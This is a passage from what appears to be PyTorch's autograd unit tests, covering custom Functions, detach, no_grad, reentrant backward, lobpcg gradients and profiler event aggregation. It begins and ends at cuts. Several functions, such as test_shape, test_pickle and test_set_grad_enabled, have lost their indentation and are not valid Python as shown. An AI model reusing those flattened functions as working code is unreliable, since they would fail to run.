            return x

        @staticmethod
        def backward(ctx, grad_x):
            return grad_x

    # Direct instantiation of a Function is deprecated.
    with self.assertWarnsRegex(DeprecationWarning, "should not be instantiated"):
        f = Id()

    # After raising the warning, it should still return an instance.
    self.assertIsInstance(f, Id)

    x = torch.zeros(1, requires_grad=True)
    with self.assertRaisesRegex(RuntimeError, "non-static forward method is deprecated"):
        f(x)
    t = Id.apply(x)
    self.assertEqual(t.grad_fn.name(), "IdBackward")

    # THPFunction is the base class of both grad_fn and autograd functions,
    # which means that a lot of accessors on them may segfault. Test that we
    # properly error in this case.
    t = torch.ones(1, requires_grad=True)
    t._backward_hooks = dict()
    with self.assertRaisesRegex(RuntimeError, "Attribute '_register_hook_dict' is invalid"):
        f._register_hook_dict(t)
    with self.assertRaisesRegex(RuntimeError, "Attribute 'register_hook' is invalid"):
        f.register_hook(lambda x, y: None)
    with self.assertRaisesRegex(RuntimeError, "Attribute 'next_functions' is invalid"):
        f.next_functions
    with self.assertRaisesRegex(RuntimeError, "Attribute 'name' is invalid"):
        f.name()
    with self.assertRaisesRegex(RuntimeError, "underlying PyNode has already been deallocated"):
        f.metadata
@unittest.expectedFailure
def test_naughty_anomaly_access(self):
    """Accessing grad_fn.metadata after the output is freed should work (known bug)."""
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, x):
            return x

        @staticmethod
        def backward(ctx, g):
            return g

    x = torch.zeros(1, requires_grad=True)
    y = MyFunction.apply(x)
    y.backward()
    y.grad_fn.metadata
    g = y.grad_fn
    del y
    g.metadata  # this currently fails, but shouldn't
def test_naughty_autograd_function_stashing_ctx(self):
    """A ctx kept alive past the graph's lifetime cannot access saved_tensors."""
    saved_ctx = []

    class Id(Function):
        @staticmethod
        def forward(ctx, x):
            ctx.save_for_backward(x)
            return x

        @staticmethod
        def backward(ctx, grad_x):
            # Deliberately leak the ctx out of backward.
            saved_ctx.append(ctx)
            return ctx.saved_tensors

    p = torch.zeros(1, requires_grad=True)
    loss = Id.apply(p)
    loss.backward(retain_graph=True)
    del loss
    # At this point in time, it complains that the graph has been freed
    # (which is indeed true, although a somewhat indirect way of stating the
    # problem).
    self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors)
def test_custom_autograd_repeated_grad_grad(self):
    # This test failed the equality check in PR #22983; it's an interesting
    # and different test case worth enshrining. mult1 is not testing
    # anything that interesting, but mult2 is the interesting case.
    def mult1(x):
        return x.prod(dim=-1).prod(dim=-1)

    class Mult(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x):
            y = mult1(x)
            ctx.save_for_backward(x, y)
            return y

        @staticmethod
        def backward(ctx, grad_output):
            x, y = ctx.saved_tensors
            return (grad_output * y)[:, None, None] / x

    mult2 = Mult.apply

    def check_gradgrad_repeated(x, y):
        # Computing grad-of-grad twice from the same forward must agree.
        gy, = torch.autograd.grad(y[0], x, create_graph=True)
        ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
        gy, = torch.autograd.grad(y[0], x, create_graph=True)
        ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
        self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1])

    x = torch.ones(2, 4, 4).requires_grad_()
    check_gradgrad_repeated(x, mult1(x))
    check_gradgrad_repeated(x, mult2(x))
def test_custom_autograd_no_early_free(self):
    # This test failed complaining that buffers had already been freed
    # prior to #22983. Also pretty interesting test case.
    class Double(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x):
            y = x ** 2
            ctx.save_for_backward(x, y)
            return y

        @staticmethod
        def backward(ctx, grad_output):
            x, _ = ctx.saved_tensors
            return grad_output * 2 * x

    # this is equivalent, but uses the output of .forward() in .backward()
    class Double2(Double):
        @staticmethod
        def backward(ctx, grad_output):
            x, y = ctx.saved_tensors
            return grad_output * 2 * y / x

    double = Double.apply
    double2 = Double2.apply

    x = torch.tensor(2).double().requires_grad_()

    self.assertTrue(gradcheck(double, x))
    self.assertTrue(gradgradcheck(double, x))
    self.assertTrue(gradcheck(double2, x))
    self.assertTrue(gradgradcheck(double2, x))

    y = double(x)
    torch.autograd.grad(y, x, create_graph=True)
    torch.autograd.grad(y, x)

    y = double2(x)
    torch.autograd.grad(y, x, create_graph=True)
    torch.autograd.grad(y, x)  # should not error!
def test_detach(self):
    """detach()/detach_() cut the graph; detach_() on a view is an error."""
    x = torch.randn(10, 10, requires_grad=True)
    y = x + 2
    y = y.detach()
    z = y * 4 + 2
    self.assertFalse(y.requires_grad)
    self.assertFalse(z.requires_grad)

    x = torch.randn(10, 10, requires_grad=True)
    y = x * 2
    y = y.detach()
    self.assertFalse(y.requires_grad)
    self.assertIsNone(y.grad_fn)
    z = x + y
    z.sum().backward()
    # This is an incorrect gradient, but we assume that's what the user
    # wanted. detach() is an advanced option.
    self.assertEqual(x.grad, torch.ones(10, 10))

    # in-place detach
    x = torch.randn(10, 10, requires_grad=True)
    y = torch.randn(10, 10, requires_grad=True)
    a = x * 2
    (y + a).sum().backward(retain_graph=True)
    a.detach_()
    self.assertFalse(a.requires_grad)
    (y + a).sum().backward()  # this won't backprop to x
    self.assertEqual(x.grad, torch.ones(10, 10) * 2)
    self.assertEqual(y.grad, torch.ones(10, 10) * 2)

    # in-place detach on a view raises an exception
    view = x.narrow(0, 1, 4)
    self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_())
def test_detach_base(self):
    """Detaching the base tensor does not detach an existing view of it."""
    x = torch.randn(10, 10, requires_grad=True)
    view = x.narrow(0, 1, 4)
    x.detach_()
    self.assertFalse(x.requires_grad)
    # The view keeps its own grad history even though its base was detached.
    self.assertTrue(view.requires_grad)
    self.assertIsNotNone(view.grad_fn)
    self.assertIs(view._base, x)
def _test_type_conversion_backward(self, t, ):
    """Helper: backward through dtype casts yields grads of the source type.

    `t` maps a CPU tensor to the device/type under test.
    """
    # float -> double -> backward: grad keeps fvar's type.
    fvar = Variable(t(torch.randn(5, 5).float()), requires_grad=True)
    fvar.double().sum().backward()
    self.assertEqual(fvar.grad, torch.ones_like(fvar))
    self.assertEqual(type(fvar.grad), type(fvar))
    # double -> float -> backward: grad keeps dvar's type.
    dvar = Variable(t(torch.randn(5, 5).double()), requires_grad=True)
    dvar.float().sum().backward()
    self.assertEqual(dvar.grad, torch.ones_like(dvar))
    self.assertEqual(type(dvar.grad), type(dvar))
def test_type_conversions(self):
    """Legacy tensor-type conversions (.type/.type_as/.cuda/.cpu) round-trip."""
    x = torch.randn(5, 5)
    self.assertIsInstance(x.float(), torch.FloatTensor)
    self.assertIsInstance(x.int(), torch.IntTensor)
    if torch.cuda.is_available():
        self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor)
        self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor)
        self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor)
        if torch.cuda.device_count() >= 2:
            x2 = x.float().cuda(1)
            self.assertIsInstance(x2, torch.cuda.FloatTensor)
            self.assertIs(x2.get_device(), 1)
            x2 = x.float().cuda()
            self.assertIsInstance(x2, torch.cuda.FloatTensor)
            self.assertIs(x2.get_device(), 0)
            x2 = x2.cuda(1)
            self.assertIsInstance(x2, torch.cuda.FloatTensor)
            self.assertIs(x2.get_device(), 1)
            y = Variable(torch.randn(5).cuda(1), requires_grad=True)
            y.cpu().sum().backward()
            # Gradient must land on the same device as the leaf.
            self.assertIs(y.grad.get_device(), 1)
            self.assertIs(y.long().get_device(), 1)

    for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]:
        for y_var in (True, False):
            y = torch.randint(5, (5, 5), dtype=t.dtype)
            y = Variable(y) if y_var else y
            self.assertIsInstance(x.type(t), t)
            self.assertIsInstance(x.type_as(y), t)
            # TODO: t.dtype should work
            t_dtype = t().dtype
            self.assertIsInstance(x.type(t_dtype), t)
            self.assertIs(t_dtype, x.type(t_dtype).dtype)
            # Converting to the same type must not copy the storage.
            self.assertEqual(y.data_ptr(), y.type(t).data_ptr())
            if torch.cuda.is_available():
                for x_cuda in (True, False):
                    for y_cuda in (True, False):
                        x_c = x.cuda() if x_cuda else x
                        y_c = y.cuda() if y_cuda else y
                        _, y_type = y_c.type().rsplit('.', 1)
                        y_typestr = ('torch.cuda.' if y_cuda else 'torch.') + y_type
                        self.assertEqual(y_c.type(), x_c.type(y_typestr).type())
                        self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype)
                        self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr())

    self._test_type_conversion_backward(lambda x: x)
    if torch.cuda.is_available():
        self._test_type_conversion_backward(lambda x: x.cuda())
        if torch.cuda.device_count() >= 2:
            # one of these has to be the non-default device
            self._test_type_conversion_backward(lambda x: x.cuda(0))
            self._test_type_conversion_backward(lambda x: x.cuda(1))
def test_isolated_node(self):
    """Backward works through a graph containing a non-differentiable branch."""
    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5, requires_grad=True)

    a = x + y
    # max-indices are non-differentiable; b is an "isolated" node.
    b = torch.max(a, 1, True)[1].repeat(1, 5).double()
    o = (b + a).sum()
    o.backward()
def test_shape(self):
x = torch.randn(3, 4)
self.assertEqual(2, len(x.shape))
self.assertEqual(x.shape[0], 3)
self.assertEqual(x.shape[1], 4)
def test_numpy_requires_grad(self):
x = torch.randn(2, 2, requires_grad=True)
err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead."
with self.assertRaisesRegex(RuntimeError, err_msg_outputs):
x.numpy()
with torch.no_grad():
x.numpy()
x = torch.randn(2, 2)
x.numpy()
with torch.no_grad():
x.numpy()
def test_return_leaf(self):
    """Returning an input unchanged from a Function still routes grads correctly."""
    class Identity(Function):
        @staticmethod
        def forward(ctx, a, b):
            return a, a + b

        @staticmethod
        def backward(ctx, grad_a, grad_b):
            return grad_a + grad_b, grad_b

    hook_called = [False]
    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5, requires_grad=True)

    q, p = Identity.apply(x, y)

    # Make sure hooks only receive grad from usage of q, not x.
    def hook(grad):
        hook_called[0] = True
        self.assertEqual(grad, torch.ones(5, 5))

    q.register_hook(hook)
    (q + p + x).sum().backward()
    self.assertEqual(x.grad, torch.ones(5, 5) * 3)
    self.assertEqual(y.grad, torch.ones(5, 5))
    self.assertTrue(hook_called[0])
def test_return_leaf_inplace(self):
    """Dirtying a non-grad input in-place attaches the Function's grad_fn to it."""
    class Inplace(InplaceFunction):
        @staticmethod
        def forward(ctx, a, b):
            ctx.mark_dirty(a)
            return a.add_(b), b + 2

        @staticmethod
        def backward(ctx, grad_a, grad_b):
            return grad_a, grad_a + grad_b

    x = torch.randn(5, 5)
    y = torch.randn(5, 5, requires_grad=True)

    q, p = Inplace.apply(x, y)
    # The in-place output is the same object as the input...
    self.assertIs(q, x)
    # ...but now carries the function's backward node and requires grad.
    self.assertIs(q.grad_fn.__class__, Inplace._backward_cls)
    self.assertTrue(q.requires_grad)
    q.sum().backward()
    self.assertEqual(y.grad, torch.ones(5, 5))
def test_leaf_assignment(self):
    """Assigning grad-requiring tensors into a plain tensor makes it require grad."""
    x = torch.randn(5, 5)
    y = torch.randn(5, requires_grad=True)
    z = torch.randn(5, requires_grad=True)

    x[0] = y
    x[1] = 2 * z
    self.assertTrue(x.requires_grad)
    self.assertIsNot(x.grad_fn, None)
    x.sum().backward()
    self.assertEqual(y.grad, torch.ones(5))
    self.assertEqual(z.grad, torch.ones(5) * 2)
def test_no_grad_assignment(self):
    """In-place assignment under no_grad records no graph on the target."""
    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5)
    with torch.no_grad():
        x[0] = y

    # x stays a leaf: requires_grad but no grad_fn.
    self.assertTrue(x.requires_grad)
    self.assertIsNone(x.grad_fn)
def test_no_grad_modifies_version(self):
    """In-place mutation under no_grad still bumps the version counter."""
    x = torch.randn(5, requires_grad=True)
    y = torch.randn(5, requires_grad=True)
    z = (x * y).sum()
    with torch.no_grad():
        x *= 2
    # z's backward saved x; the no_grad mutation must still invalidate it.
    self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation',
                           lambda: z.backward())
def test_no_grad_input(self):
    """A custom Function applied under no_grad records no grad_fn on the output."""
    class MyFunction(Function):
        @staticmethod
        def forward(self, x):
            return x

        @staticmethod
        def backward(self, grad_output):
            return grad_output

    x = torch.randn(5, requires_grad=True)
    with torch.no_grad():
        y = MyFunction.apply(x)

    # The input keeps requires_grad; only the output is detached.
    self.assertTrue(x.requires_grad)
    self.assertIsNone(y.grad_fn)
def test_backward_copy(self):
    # This test checks backward engine for a very subtle bug that appeared
    # in one of the initial versions of autograd. Gradients tensors were
    # simply stored in lists while the function waited for all its gradients
    # to be computed. However, sometimes an output was used multiple times,
    # so the gradients needed to be summed. Engine used to keep a need_copy
    # set of tensors that will need a clone upon next addition and removed
    # them from the set as soon as the clone was performed. However, this
    # could lead to incorrect results if the same gradient tensor was
    # buffered in three places in the graph:
    # 1. When accumulating gradients in one of these places it was cloned
    #    and removed from need_copy set.
    # 2. When accumulating in second place, it wasn't in the need_copy set,
    #    so the gradients were simply accumulated in-place (which already
    #    modified the grad in 3rd place)
    # 3. When accumulating in the third place, it wasn't in the need_copy set
    #    as well, so the incoming gradient was summed in-place, yielding
    #    incorrect results in all functions, except the first one.
    x = torch.ones(5, 5, requires_grad=True)
    y = torch.ones(5, 5, requires_grad=True)
    # Simulate that we're in the middle of the graph
    a = x + 2
    b = y + 2
    c = x + 2
    # This op will just return grad_output two times in backward
    add1 = a + b
    add2 = add1 + c
    # Simulate a long branch, so grad_output will get buffered.
    for _ in range(4):
        a = a * 2
        b = b * 2
        c = c * 2
    branch = a + b + c
    out = add2 + branch
    # expected gradients are:
    # for x: 34 (16 from final a, 16 from final c, 2 from add2)
    # for y: 17 (16 from final b, 1 from add2)
    grad_output = torch.ones(5, 5)
    out.backward(grad_output)
    self.assertEqual(x.grad, torch.ones(5, 5) * 34)
    self.assertEqual(y.grad, torch.ones(5, 5) * 17)
def test_save_none_for_backward(self):
    """save_for_backward accepts None entries and returns them unchanged."""
    test_case = self

    class MyFn(Function):
        @staticmethod
        def forward(ctx, input):
            ctx.save_for_backward(None, input, None)
            return input * input

        @staticmethod
        def backward(ctx, grad_output):
            n1, input, n2 = ctx.saved_tensors
            # The None placeholders round-trip as None.
            test_case.assertIsNone(n1)
            test_case.assertIsNone(n2)
            return 2 * input * grad_output

    x = torch.randn(5, 5, requires_grad=True)
    y = MyFn.apply(x)
    y.sum().backward()
    self.assertEqual(x.grad, 2 * x)
def test_too_many_grads(self):
    """Extra trailing None grads returned from backward are tolerated."""
    class MyFn(Function):
        @staticmethod
        def forward(ctx, input):
            return input

        @staticmethod
        def backward(ctx, grad_output):
            # More grads than inputs — the surplus Nones are ignored.
            return grad_output, None, None

    x = torch.randn(5, 5, requires_grad=True)
    y = MyFn.apply(x)
    y.sum().backward()
    self.assertEqual(x.grad, torch.ones_like(x))
def test_pickle(self):
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=False)
def assert_strict_equal(var1, var2):
self.assertEqual(var1, var2)
self.assertEqual(var1.requires_grad, var2.requires_grad)
serialized = [pickle.dumps([x, y], protocol=p) for p in range(3)]
for dump in serialized:
xc, yc = pickle.loads(dump)
assert_strict_equal(xc, x)
assert_strict_equal(yc, y)
def test_dep_nograd(self):
    """A non-differentiable output can feed another Function without breaking grads."""
    class F1(Function):
        @staticmethod
        def forward(ctx, input):
            out = torch.randn(input.size())
            ctx.mark_non_differentiable(out)
            return input, out

        @staticmethod
        def backward(ctx, grad_output, ignored):
            return grad_output

    class F2(Function):
        @staticmethod
        def forward(ctx, input, ignored):
            return input

        @staticmethod
        def backward(ctx, grad_output):
            return grad_output, None

    x = torch.randn(5, requires_grad=True)
    a, b = F1.apply(x)
    b = b + 1  # separate F1 from F2 by another op
    self.assertTrue(a.requires_grad)
    self.assertFalse(b.requires_grad)
    c = F2.apply(a, b)
    c.backward(torch.ones(c.size()))
    self.assertEqual(x.grad, torch.ones(x.size()))
def test_set_grad_enabled(self):
x = torch.tensor([1.], requires_grad=True)
with torch.set_grad_enabled(False):
y = x * 2
self.assertFalse(y.requires_grad)
with torch.set_grad_enabled(True):
y = x * 2
self.assertTrue(y.requires_grad)
with torch.set_grad_enabled(False):
torch.set_grad_enabled(True)
y = x * 2
self.assertTrue(y.requires_grad)
def test_simple_reentrant(self):
    """A backward() invoked from inside another backward (reentrant) works."""
    y_data = torch.randn(2, 2)

    class Reenter(Function):
        @staticmethod
        def forward(ctx, x):
            # Build an inner graph under enable_grad so backward can rerun it.
            with torch.enable_grad():
                ctx.x = Variable(x, requires_grad=True)
                ctx.y = Variable(y_data, requires_grad=True)
                ctx.output_var = ctx.x * ctx.y
            return ctx.output_var.detach()

        @staticmethod
        def backward(ctx, grad_output):
            # Reentrant backward: run the inner graph's backward here.
            with torch.enable_grad():
                ctx.output_var.sum().backward()
            return ctx.x.grad * grad_output

    # Reentrant starts on CPU thread, finishes on GPU thread
    x = torch.randn(2, 2, requires_grad=True)
    out = Reenter.apply(x)
    out.sum().backward()
    self.assertEqual(x.grad, y_data)
def test_reentrant_child_error(self):
    """An error raised in a reentrant child backward propagates to the parent."""
    # Parent graph.
    a = torch.rand(3, 3, requires_grad=True)
    c = a * a

    # Reentrant child graph.
    b = torch.rand(3, 3, requires_grad=True)
    e = b * b
    f = TestAutograd.SimulateBackwardError.apply(e)
    reentrant_root = f.sum()

    class ReentrantFunc(Function):
        @staticmethod
        def forward(ctx, inp):
            return inp.clone()

        @staticmethod
        def backward(ctx, grad):
            # Reentrant backward in child will throw an error.
            reentrant_root.backward()
            return grad

    d = ReentrantFunc.apply(c)
    with self.assertRaisesRegex(Exception, 'Simulate error'):
        d.sum().backward()
def test_var_mean_differentiable(self):
    """Fused var_mean matches separate var()/mean() in value and gradient."""
    dim = [2, 4]
    keepdim = False
    input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True)
    input2 = deepcopy(input1)
    var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim)
    var2 = input2.var(dim=dim, keepdim=keepdim)
    mean2 = input2.mean(dim=dim, keepdim=keepdim)
    grad = torch.randn(3, 4, 6, 3, requires_grad=True)

    # Mix var and mean so both outputs contribute to the gradient.
    r1 = var1 * var1 * mean1 * mean1
    r2 = var2 * var2 * mean2 * mean2
    self.assertEqual(r1, r2, rtol=0.01, atol=0.0)

    torch.autograd.backward(r1, grad)
    torch.autograd.backward(r2, grad)
    self.assertEqual(input1.grad, input2.grad, rtol=0.01, atol=0.0)
@skipIfNoLapack
def test_lobpcg(self):
    """gradcheck/gradgradcheck torch.lobpcg; A.grad must come out symmetric."""
    def func(k, A, largest=True, B=None):
        # Fix the initial eigenspace X so the forward is deterministic.
        X_shape = list(A.shape)
        X_shape[-1] = k
        X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device)
        if A.dim() > 2:
            X = X.expand(X_shape)

        D, U = torch.lobpcg(A=A, k=k, B=B, X=X, largest=largest)

        # LOBPCG uses a random initial eigenspace approximation
        # if parameter `X` is not provided.
        # This may cause a non-deterministic behavior
        # when it comes to the sign of an eigenvector
        # (note if v is an eigenvector, so is -v),
        # hence we eliminate this non-determinism
        # by making sure that each column of U
        # gets multiplied by the sign of its max (in absolute value) element.
        # Also, gradcheck changes the content of the input by +/- eps (default to 1e-06)
        # to compute the numerical gradient which can also cause the signs to flip.
        _, idx = U.abs().max(-2, keepdim=True)
        sign = U.gather(-2, idx).sign()
        U = U * sign
        return D, U

    # TODO: review if this can be ported to OpInfos or moved to test_linalg.py
    def run_symeig_test(k, sizes, largest=True):
        # Build a symmetric positive input A = (A @ A^T) / 10.
        A = torch.rand(*sizes).double()
        A = (A @ A.mT) / 10
        A.requires_grad_(True)

        gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False)

        # Custom gradient vectors for better stability due to some
        # non-determinism in the lobpcg's forward.
        # Note it is not required if symeig is in forward instead (tested).
        D_grad = torch.rand(*A.shape[:-2], k) / 100
        U_grad = torch.rand(*A.shape[:-1], k) / 100
        gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False)

        # check whether A.grad is symmetric
        A = A.detach().requires_grad_(True)
        D, U = func(k, A, largest)
        (D.sum() + U.sum()).backward()
        self.assertEqual(A.grad, A.grad.mT)

    for largest in [True, False]:
        run_symeig_test(1, (6, 6), largest=largest)
        run_symeig_test(1, (2, 6, 6), largest=largest)
        run_symeig_test(1, (2, 2, 6, 6), largest=largest)
        run_symeig_test(2, (6, 6), largest=largest)
        run_symeig_test(2, (2, 6, 6), largest=largest)
        run_symeig_test(2, (2, 2, 6, 6), largest=largest)
        run_symeig_test(3, (9, 9), largest=largest)
        run_symeig_test(3, (2, 9, 9), largest=largest)
        run_symeig_test(3, (2, 2, 9, 9), largest=largest)
def test_variable_traverse(self):
    """GC of a reference cycle must not free variables still used by the graph."""
    def get_out_and_unrefed_cycle():
        inp = torch.randn(10, requires_grad=True)
        tmp = inp.view(10, 1)
        out = tmp.view(10)

        # Create a reference cycle that contains an
        # intermediary Variable in the graph
        my_list = []
        my_list.append(tmp)
        my_list.append(my_list)

        return out

    out = get_out_and_unrefed_cycle()
    gc.collect()
    # This will segfault if things have been erroneously released
    out.backward(torch.randn(out.size()))
# TODO: review porting these to OpInfo tests
def test_pow_zero_tensor_gradient(self):
    """pow at zero base yields a zero (not NaN/inf) gradient."""
    def run_test(input_size, exponent):
        input = torch.zeros(*input_size, requires_grad=True)
        input.pow(exponent).sum().backward()
        self.assertEqual(input.grad.abs().sum(), 0)

    run_test((10,), torch.zeros(10))
    run_test((10, 10), torch.zeros(10, 10))
    run_test((10,), 0)
def test_profiler(self):
    """Profiler is enabled only inside the context and records the aten ops run."""
    x = torch.randn(10, 10)

    with profile(use_kineto=kineto_available()) as p:
        self.assertTrue(torch.autograd._profiler_enabled())
        y = x * 2 + 4

    # Profiling must be switched off again once the context exits.
    self.assertFalse(torch.autograd._profiler_enabled())

    names = ['aten::mul', 'aten::add']
    found_indices = set()
    for evt in p.function_events:
        if evt.name in names:
            found_indices.add(names.index(evt.name))
    # assertEquals is a deprecated alias removed in Python 3.12; use assertEqual.
    self.assertEqual(len(found_indices), len(names))
def test_profiler_seq_nr(self):
    """Forward ops and their backward nodes share the same sequence number."""
    with profile(use_kineto=kineto_available()) as p:
        x = torch.randn(10, 10, requires_grad=True)
        y = torch.randn(10, 10, requires_grad=True)
        z = x + y
        s = z.sum()
        s.backward()
    print(p.key_averages().table(
        sort_by="self_cpu_time_total", row_limit=-1))
    # expecting aten::add, aten::sum to have the sequence numbers,
    # expecting the corresponding backward nodes to have the same numbers
    # as the forward ops
    add_seq_nr = -1
    sum_seq_nr = -1
    found_add = found_sum = False
    found_bwd_add = found_bwd_sum = False
    found_empty = False
    for e in p.function_events:
        # Ignore record_function user scope.
        if "autograd::engine::evaluate_function" in e.name:
            continue
        if e.name == "aten::add":
            add_seq_nr = e.sequence_nr
            self.assertFalse(found_add)
            found_add = True
        elif e.name == "aten::sum":
            sum_seq_nr = e.sequence_nr
            self.assertFalse(found_sum)
            found_sum = True
        elif "Add" in e.name and "Backward" in e.name:
            self.assertEqual(e.sequence_nr, add_seq_nr)
            self.assertFalse(found_bwd_add)
            found_bwd_add = True
        elif "Sum" in e.name and "Backward" in e.name:
            self.assertEqual(e.sequence_nr, sum_seq_nr)
            self.assertFalse(found_bwd_sum)
            found_bwd_sum = True
        # check that nested ops (e.g. empty) don't have
        # sequence number
        if e.name == "aten::empty":
            self.assertEqual(e.sequence_nr, -1)
            found_empty = True
    self.assertGreaterEqual(add_seq_nr, 0)
    self.assertGreaterEqual(sum_seq_nr, 0)
    self.assertNotEqual(add_seq_nr, sum_seq_nr)
    self.assertTrue(found_add)
    self.assertTrue(found_sum)
    self.assertTrue(found_bwd_add)
    self.assertTrue(found_bwd_sum)
    self.assertTrue(found_empty)
def test_profiler_unboxed_only(self):
    """Profiling an op with an unboxed-only kernel (resize_) must not crash."""
    x = torch.rand(3, 4)

    with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
        x.resize_([3, 2])
def test_profiler_propagation(self):
    """Profiler state propagates across a TorchScript fork.

    ``bar`` forks a traced function and waits on it; all three user-scoped
    record_function ranges ("in_foo", "in_bar", "in_bar_after_wait") must
    each appear exactly once in the profiled events, even though the
    continuation may run on a different thread.
    """
    def foo(x):
        with record_function("in_foo") as rf:
            return x * 2
    x = torch.rand(3, 4)
    traced_foo = torch.jit.trace(foo, x)
    def bar(x):
        with record_function("in_bar") as rf:
            # we expect that profiler will be able
            # propagate across fork
            fut = torch.jit._fork(traced_foo, x)
            y = torch.jit._wait(fut)
            # note: continuation (and rf's end) can
            # be executed in a different thread
            with record_function("in_bar_after_wait") as rf2:
                y = y * 2
            return y
    traced_bar = torch.jit.trace(bar, x)
    with profile(use_kineto=kineto_available()) as p:
        traced_bar(x)
    found_foo = False
    found_bar = False
    found_bar_after_wait = False
    # each user scope must be recorded exactly once
    for info in p.function_events:
        if info.name == "in_foo":
            self.assertFalse(found_foo)
            found_foo = True
        elif info.name == "in_bar":
            self.assertFalse(found_bar)
            found_bar = True
        elif info.name == "in_bar_after_wait":
            self.assertFalse(found_bar_after_wait)
            found_bar_after_wait = True
    self.assertTrue(found_foo)
    self.assertTrue(found_bar)
    self.assertTrue(found_bar_after_wait)
def test_record_function_callbacks(self):
    """A user-scoped record_function range appears exactly once in the trace."""
    inp = torch.randn(10, 10)
    with profile(use_kineto=kineto_available()) as prof:
        with record_function("foo"):
            _ = inp * 2 + 4
    # locate the user scope among the recorded events
    foo_event = next(evt for evt in prof.function_events if "foo" in evt.name)
    self.assertEqual(foo_event.count, 1)
def test_profiler_aggregation_fake(self):
    """_populate_cpu_children nests intervals correctly across threads.

    Builds synthetic FunctionEvents by hand and checks the computed
    parent/child relationships: on thread 0, [1, 3] pushes out [0, 2]
    first, then [1, 2] (id 4) becomes a child of [1, 3] (id 5).

    Fixes: renamed locals that shadowed the ``id`` and ``range`` builtins,
    and replaced bare ``assert`` statements (stripped under ``-O``) with
    unittest assertions.
    """
    events = EventList()
    next_id = [0]

    def get_id():
        # simple monotonically increasing event id
        next_id[0] += 1
        return next_id[0]

    # [[thread_id, [(start, end, id), ....]], ...]
    # Using list instead of a dict so order is guaranteed for any Python
    # version
    threads = [
        [1, [(0, 1, get_id()), (1, 2, get_id())]],
        [0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]],
    ]
    for thread, ranges in threads:
        for interval in ranges:
            self.assertEqual(len(interval), 3)
            events.append(
                FunctionEvent(
                    id=interval[2],
                    node_id=0,
                    name="",
                    thread=thread,
                    start_us=interval[0],
                    end_us=interval[1],
                )
            )
    events._populate_cpu_children()
    # Note that [1, 3] pushes out [0, 2] first. Then we record [1, 2]
    # as a child of [1, 3]
    res = [[], [], [], [], [4]]

    def get_children_ids(event):
        return [child.id for child in event.cpu_children]

    self.assertEqual([get_children_ids(event) for event in events], res)
def test_profiler_aggregation_table(self):
    """
    Test if the profiling result is aggregated for `str(prof)`
    See: https://github.com/pytorch/pytorch/issues/37500
    """
    data = torch.randn(1024)
    with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
        torch.einsum("i->", data)
    # str(prof) must route through the same aggregation as prof.table()
    self.assertEqual(prof.table(), str(prof))
def test_profiler_function_event_avg(self):
    """FunctionEventAvg accumulates counts/times, including adding itself."""
    aggregate = FunctionEventAvg()
    for evt_id, start, end in ((0, 10, 15), (1, 20, 30)):
        aggregate.add(FunctionEvent(
            id=evt_id, node_id=0, name="foo", thread=0, start_us=start, end_us=end))
    # adding the running average to itself doubles every aggregate stat
    aggregate.add(aggregate)
    self.assertEqual(aggregate.key, "foo")
    # aggregate stats
    self.assertEqual(aggregate.count, 4)
    self.assertEqual(aggregate.cpu_time_total, 30)
    self.assertEqual(aggregate.self_cpu_time_total, 30)
    self.assertEqual(aggregate.cuda_time_total, 0)
    # average stats
    self.assertEqual(aggregate.cpu_time, 7.5)
    self.assertEqual(aggregate.cuda_time_total, 0)
def test_profiler_shapes(self):
    """record_shapes=True captures input shapes for aten::linear.

    Two Linear layers are run; each recorded aten::linear event's input
    shapes must be one of the two expected [input, weight, bias] shape
    lists, and both must be observed.
    """
    print("")
    layer1 = torch.nn.Linear(20, 30)
    layer2 = torch.nn.Linear(30, 40)
    input = torch.randn(128, 20)
    with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
        layer2(layer1(input))
    print(prof.function_events)
    # [input, weight, bias] shapes for the two linear calls
    linear_expected_shapes = [
        [[128, 20], [30, 20], [30]],
        [[128, 30], [40, 30], [40]],
    ]
    found_indices = set()
    for event in prof.function_events:
        if event.name == "aten::linear":
            self.assertTrue(event.input_shapes in linear_expected_shapes)
            found_indices.add(linear_expected_shapes.index(event.input_shapes))
    self.assertEqual(len(found_indices), len(linear_expected_shapes))
def test_profiler_aggregation_lstm(self):
    """Exercise table rendering / aggregation options on an LSTM workload.

    Smoke-tests several ``table()`` variants (headers, input-shape grouping,
    top-level-only filtering, source-column width), compares wall-clock time
    against the profiler's self CPU time, and checks Chrome-trace export on
    non-Windows platforms. No assertions — failures surface as exceptions.
    """
    print("")
    rnn = torch.nn.LSTM(10, 20, 2)
    total_time_s = 0
    with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
        for i in range(20):
            input = torch.randn(5, 3, 10)
            h = torch.randn(2, 3, 20)
            c = torch.randn(2, 3, 20)
            start = time.time()
            rnn(input, (h, c))
            end = time.time()
            total_time_s += end - start
    print(prof.table(
